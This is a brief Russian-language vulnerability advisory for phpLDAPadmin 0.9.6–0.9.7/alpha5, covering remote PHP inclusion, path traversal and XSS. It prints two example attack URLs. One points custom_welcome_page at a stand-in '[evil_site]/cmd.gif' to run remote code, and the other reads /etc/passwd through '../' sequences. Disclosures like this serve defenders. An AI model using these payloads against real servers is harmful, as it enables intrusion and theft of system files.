Программа: phpLDAPadmin 0.9.6 — 0.9.7/alpha5 

Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение и выполнить произвольный PHP сценарий на целевой системе с привилегиями web сервера.
Уязвимость позволяет удаленному пользователю с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе с привилегиями web сервера. 

Пример:

http://[target]/[path]/phpldapadmin/welcome.php? custom_welcome_page=http ://[evil_site]/cmd.gif

Удаленный пользователь может просмотреть произвольные файлы на системе с помощью символов обхода каталога.

Пример:

http://[target]/[path]/phpldapadmin/welcome.php? custom_welcome_page=../../../../../../../../etc/passwd 

Удаленный пользователь может также выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Оставить мнение

Check Also

Минюст США заявляет, что Guccifer 2.0 — это 12 офицеров ГРУ, и это они взломали Демократическую партию США

Власти США предъявили обвинения 12 офицерам ГРУ, обвинив их во взломе Национального комите…